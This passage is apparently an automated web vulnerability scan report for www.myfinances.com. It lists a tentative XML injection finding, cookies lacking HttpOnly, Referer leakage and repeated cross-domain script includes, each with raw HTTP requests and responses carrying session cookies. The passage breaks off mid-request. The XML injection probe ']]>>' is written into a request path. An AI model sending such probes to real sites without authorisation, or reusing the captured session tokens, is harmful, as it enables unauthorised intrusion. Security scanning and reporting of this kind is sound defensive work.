Date: Thu, 03 Feb 2011 17:04:53 GMT
Content-Length: 6490
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<!-- START listxml Partial -->
...[SNIP]...

2.4. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.myfinances.com
Path:   /solo/form/dispatcher

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /solo/form/dispatcher]]>> HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:20 GMT
Content-Length: 6490
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<!-- START listxml Partial -->
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /budget.php HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:10 GMT
Content-Length: 21607
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.26CKOUQ; path=/
Set-Cookie: PHPSESSID=ddqd7n9uvj64k8219a35nnf334; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-en6jWk7gER-qLy1IQnCcA3MXNSqJbSDkss6lPOg8_nCsvDvyYs6_ELG_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQISZILhVPIHcdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Coh20AJxrkr4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-en6jWk7gER-qLy1IQnCcA3MXNSqJbSDkss6lPOg8_nCsvDvyYs6_ELG_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQISZILhVPIHcdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Coh20AJxrkr4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-en6jWk7gER-qLy1IQnCcA3MXNSqJbSDkss6lPOg8_nCsvDvyYs6_ELG_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQISZILhVPIHcdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Coh20AJxrkr4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...

4. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /blog.html?page=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:01:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:01:13 GMT
Content-Length: 17435
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div class="module ads_cj">
<a href="http://www.myfico.com/Default.aspx?campaign=XG734Q" target="_blank">
<img src="/includes/images/10961116.gif" width="300" height="250" alt="" border="0"/>
...[SNIP]...

5. Cross-domain script include  previous  next
There are 25 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. http://www.myfinances.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:01:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:01:04 GMT
Content-Length: 17719
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.2. http://www.myfinances.com/about.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /about.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about.html HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:01:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:01:13 GMT
Content-Length: 6872
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.3. http://www.myfinances.com/blog.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog.html HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:59:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:59:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: adc=RSP; path=/;
Content-Length: 17564

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.4. http://www.myfinances.com/blog/3171093.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3171093.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/3171093.html HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:23 GMT
Content-Length: 13273
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.5. http://www.myfinances.com/blog/3171103.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3171103.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/3171103.html HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:23 GMT
Content-Length: 13665
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.6. http://www.myfinances.com/blog/3227953.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3227953.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/3227953.html HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:16 GMT
Content-Length: 13869
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.7. http://www.myfinances.com/blog/3227963.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3227963.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/3227963.html HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:05 GMT
Content-Length: 13487
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.8. http://www.myfinances.com/blog/3241183.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3241183.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/3241183.html HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:03 GMT
Content-Length: 13523
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.9. http://www.myfinances.com/blog/3241193.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3241193.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/3241193.html HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:01 GMT
Content-Length: 13967
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.10. http://www.myfinances.com/blog/3299523.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299523.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/3299523.html HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
